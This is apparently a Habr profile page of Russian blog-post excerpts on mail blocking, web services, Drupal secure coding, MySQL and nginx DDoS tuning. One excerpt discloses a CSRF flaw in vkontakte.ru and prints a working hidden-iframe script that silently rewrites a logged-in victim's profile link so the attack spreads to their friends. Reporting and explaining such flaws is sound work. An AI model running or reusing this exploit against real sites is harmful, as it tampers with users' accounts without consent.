Pull to refresh
10
0
Алексей Скобелев @Oddboy

User

Send message

Спама больше не будет. Но и писем тоже. Mail.ru

Reading time 1 min
Views 1.7K
В прошлой своей записи Mail.ru забанил Яндекс я сообщил о блокировании администрацией mail.ru одного из шлюзов Яндекса, было несколько версий и мало эмоций.

UPD: у меня почтовый ящик на яндексе, а я отправляю письмо на mail.ru
Читать дальше →
Total votes 191: ↑181 and ↓10 +171
Comments 154

Победимый баг (отображение ключевых слов в ГуглоАналитике)

Reading time 1 min
Views 531
Используя новую версию Аналитику Гугла для сбора статистики по сайту, обнаружил небольшую, но малоприятную ошибку,- в отчётах по ключевым словам с поисковых систем сами ключевые слова выводятся в нечитаемой форме, например, %22%d0%9f%d0%b5%d1%81%d0%b5%d0%bd%d0%ba%d0%b0 вместо «Песенка». Для исправления ситуации можно установить Greasemonkey скрипт, исправляющий кодированные строчки.
Читать дальше →
Total votes 6: ↑5 and ↓1 +4
Comments 12

Социальная сеть для автомобилистов: ЗаБаранкой.ру

Reading time 1 min
Views 805
В Рунете появилась ещё одна социальная сеть. Правда, в данном случае (в отличие от многих других) похоже я знаю зачем она нужна :-) По крайней мере, лично мне.

Дело в том, что как и Хабр, эта сеть нишевая, нацелена на чётко определённую аудиторию. И аудиторию весьма интересную и сплочённую — автомобилистов. И название сервиса весьма подходящее — «За Баранкой». Авторы утверждают, что они создали первую соцсеть для автомобилистов в Рунете.

Внутри можно обнаружить привычные для современных проектов разделы — блоги, группы (которые имеют здесь специфичное название «клубы») и т.п. Мне лично понравился очень простой процесс регистрации и лёгий дизайн.

По некоторым данным, сервис запущен всего неделю назад. Регистрация пока только по приглашениям. Причём, у меня почему-то оказался достаточно жёсткий лимит — всего 5 штук. Сейчас осталось 3, оставляйте адреса — вышлю, а дальше рассылайте друг другу (надеюсь, ограничение скоро будет снято или хотя бы увеличено). Не понимаю, зачем было вводить такие строгости.

Интересно, планируют ли авторы добавлять новомодные сейчас карты и другие штуки, которые есть у сетей роде ВКонтакте и Одноклассники? Авторы, ау! Ответьте!
Total votes 52: ↑30 and ↓22 +8
Comments 81

Электронные деньги. Без купюр

Reading time 7 min
Views 27K
Нам в Эльбе довольно часто задают вопросы по типу «Я „упрощёнщик“, у меня есть электронный кошелёк в Яндекс.Деньгах, как его в доходах-расходах учитывать и перед налоговой отчитаться?».

Если погуглить, в Интернете можно найти массу информации и экспириенса в этой области. Однако мы хотим сэкономить ваше драгоценное время, и поэтому поделимся своими знаниями.

Читать дальше →
Total votes 97: ↑91 and ↓6 +85
Comments 70

Монетизация веб-сервисов: бизнес модели

Reading time 4 min
Views 5.3K
Мы потратили несколько часов, исследуя онлайн-сервисы из списка Webware 100 Top Web Apps 2008 и изучая их бизнес модели. Следующая диаграмма показывает результаты исследования — 34% сервисов используют рекламную модель, 12% различные схемы подписки, 8% продают виртуальные товары (чаще всего в виде данных для скачивания), такая же доля сервисов предлагает сопутствующие продукты (обычно большие компании-разработчики предлагают бесплатный вариант продукта для привлечения к их платформе) и еще 8% сервисов используют схему «оплата за использование».
Читать дальше →
Total votes 68: ↑63 and ↓5 +58
Comments 28

Безопасный код в Друпале: Подделка межсайтовых запросов

Reading time 5 min
Views 1.4K


(ч2. Работа с базой данных; ч3. Работа с пользовательским вводом)

Поводом к написанию этой статьи послужило нахождение мною уязвимости в одном довольно известном модуле. Так как по правилам обнаружения уязвимостей, я пока не вправе распространяться о деталях, то расскажу об уязвимости в общих чертах, а также о методах борьбы с ней.

Итак, подделка межсайтовых запросов (анг. Сross Site Request Forgery, или, сокращенно, CSRF): что это такое и с чем его едят.

CSRF — это вид атак на посетителей веб-сайтов, использующий недостатки протокола HTTP. Если жертва заходит на сайт, созданный злоумышленником, от её лица тайно отправляется запрос на другой сервер (например, на сервер платёжной системы), осуществляющий некую вредоносную операцию (например, перевод денег на счёт злоумышленника). Для осуществления данной атаки, жертва должна быть авторизована на том сервере, на который отправляется запрос, и этот запрос не должен требовать какого-либо подтверждения со стороны пользователя.

Данный тип атак, вопреки распространённому заблуждению, появился достаточно давно: первые теоретические рассуждения появились в 1988 году, а первые уязвимости были обнаружены в 2000 году.

Одно из применений СSRF — эксплуатация пассивных XSS, обнаруженных на другом сервере. Так же возможны отправка спама от лица жертвы и изменение каких-либо настроек учётных записей на других сайтах(например, секретного вопроса для восстановления пароля).
Читать дальше →
Total votes 56: ↑50 and ↓6 +44
Comments 37

Безопасный код в Друпале: Работа с базой данных

Reading time 5 min
Views 5.3K


(ч1. Подделка межсайтовых запросов; ч3. Работа с пользовательским вводом)

Друпал предоставляет свои собственные средства для доступа к базе данных.

Во-первых, это позволяет не зависеть от используемого типа СУБД. К слову, на сегодняшний момент, полностью функционирует прослойка для MySQL и PostgreeSQL. В седьмом Друпале этот список будет расширен Ораклом и SQLite.

Во-вторых же, прослойка БД позволяет защититься от SQL инъекций.
Читать дальше →
Total votes 23: ↑19 and ↓4 +15
Comments 19

Безопасный код: Работа с пользовательским вводом

Reading time 5 min
Views 5.5K

(ч2. Подделка межсайтовых запросов; ч2. Работа с базой данных)

Наверняка, XSS атаки остаются самыми популярными наравне с SQL инъекциями. Их принцип прост до безобразия, а последствия разнятся от невинного коверканья вывода страниц до получения злоумышленником полного контроля над сайтом.

Некоторые сценарии XSS атак



Устойчивая атака


  • Вова создает частицу контента на сайте Пети.
  • Когда Маша просматривает этот контент, Вовин XSS ворует Машины куки.
  • Теперь Вова может пробраться на сайт, используя Машину сессию.
  • Чем более людей увидит этот контент, тем более успешной можно считать атаку. Максимум достигается путем создания противоречивых холиварных тем на сайте и т.д.
Читать дальше →
Total votes 75: ↑69 and ↓6 +63
Comments 26

Оптимизация MySQL запросов

Reading time 4 min
Views 124K
В повседневной работе приходится сталкиваться с довольно однотипными ошибками при написании запросов.

В этой статье хотелось бы привести примеры того, как НЕ надо писать запросы.
Читать дальше →
Total votes 143: ↑132 and ↓11 +121
Comments 142

Оформление цитат на сайтах

Reading time 8 min
Views 91K
Обычно при вёрстке текстов для веба на оформление цитат не обращают достаточного внимания. Стараясь исправить это досадное недоразумение, мы коснёмся двух вопросов: типографического оформления цитат (в той части, где чаще всего допускаются ошибки при вёрстке) и реализации этого оформления в HTML-коде.

Мы также не будем касаться вопросов проверки смысловой точности цитирования, правильного использования купюр, сокращений и дополнений — всех интересующихся ждёт «Справочник издателя и автора» А. Э. Мильчина и Л. К. Чельцовой.

Надеемся, что эту запись будет удобно использовать как справочник по часто встречающимся вопросам оформления цитат.

Читать дальше →
Total votes 108: ↑105 and ↓3 +102
Comments 59

CSRF на vkontakte.ru

Reading time 1 min
Views 7.8K
Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:
<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)
Total votes 143: ↑143 and ↓0 +143
Comments 134

Борьба с DDOS и DOS на уровне nginx

Reading time 1 min
Views 8.1K
FreeBSD, сетевая Intel fxp, порт 100Мбит, polling, http accept-filter
в sysctl:

sysctl kern.maxfiles=90000
sysctl kern.maxfilesperproc=80000
sysctl net.inet.tcp.blackhole=2
sysctl net.inet.udp.blackhole=1
sysctl kern.polling.burst_max=1000
sysctl kern.polling.each_burst=50
sysctl kern.ipc.somaxconn=32768
sysctl net.inet.tcp.msl=3000
sysctl net.inet.tcp.maxtcptw=40960
sysctl net.inet.tcp.nolocaltimewait=1
sysctl net.inet.ip.portrange.first=1024
sysctl net.inet.ip.portrange.last=65535
sysctl net.inet.ip.portrange.randomized=0

Читать дальше →
Total votes 48: ↑45 and ↓3 +42
Comments 42

О чём рассказали Хабрасоздатели

Reading time 4 min
Views 606
В аудитории было около 150 человек, в основном, естественно, студенты, а также разработчики, менеджеры и пользователи интернет-продуктов. Авторам лучших вопросов из зала дарили книгу Антона Попова «Блоги. Новая сфера влияния».
Видеозапись встречи (500 Мб AVI), альтернатива
Презентация от Мио

Начало проекта

О продукте, похожем на сегодняшний Хабр Денис Крючков задумался ещё во время работы в Вебпланете. После того, как он был оттуда уволен, то занялся идеей более плотно — а именно — 2 месяца гулял по городу, размышлял, наблюдал. Так родилась концепция ресурса, где бы комментирующие имели равные права со штатными редакторами и журналистами — сам были бы такими же авторами. Далее в течение ещё 2-х месяцев он сам отрисовал дизайн, договорился со знакомым программистом о разработке первой версии сайта. То, как быстро вносились исправления в систему, не устраивало Дениса и он решил подойти к проекту более фундаментально — взял кредит в банке, занял у родителей и принялся за создание полноценной версии системы.

Хабрареволюция

Первичная концепция сайта была такова, что посты редакции публиковались в разделе «тексты», а посты остальных участников — в разделе «блоги» (?). Однако с течением времени начало нарастать недовольство пользователей неравенство в правах и была совершена «хабрареволюция», при которой каждый пользователь получил право быть полноценным автором.
Читать дальше →
Total votes 125: ↑120 and ↓5 +115
Comments 130

Кому принадлежит ваша записная книжка?

Reading time 4 min
Views 2.4K

Кто виноват



Сейчас шумиха вокруг «второй версии веба» уже всем надоела, и понемногу сходит на нет, а одно из основных понятий web2.0 — user-generated content — становится привычным и широко распространенным. Миллионы пользователей создают терабайты публичной и личной информации и размещают её в интернете. Однако немногие задумываются, не меняет ли информация при этом владельца.
Читать дальше →
Total votes 52: ↑48 and ↓4 +44
Comments 92

Автокадабра готова к приему бета-тестеров

Reading time 1 min
Views 662

Автокадабра начала набор бета-тестеров. Их количество очень мало, так что кто не успел, тот…
Чтобы им стать нужно пройти жуткую каптчу, у меня есть подозрения, что она и правильные ответы иногда бракует. Приступим к тестированию?

Update: Инвайтов не существует — хватит кормить спам-боты.
Total votes 57: ↑46 and ↓11 +35
Comments 265

Иконки, смайлики и т.п. зло: методы борьбы

Reading time 2 min
Views 2.9K

Преамбула


Почти все веб-разработчики рано или поздно сталкиваются с необходимостью создания интерфейсов, содержащих кучу мелких деталей. Думаю, подавляющее большенство нашего брата, не долго думая, режет кучу этих мелких деталей на кучу маленьких картинок, на чем и останавливается, не задумываясь
о возможных неприятностях или о вполне реальных полезностях иных подходов
Total votes 57: ↑49 and ↓8 +41
Comments 58

Information

Rating
Does not participate
Location
Москва и Московская обл., Россия
Date of birth
Registered
Activity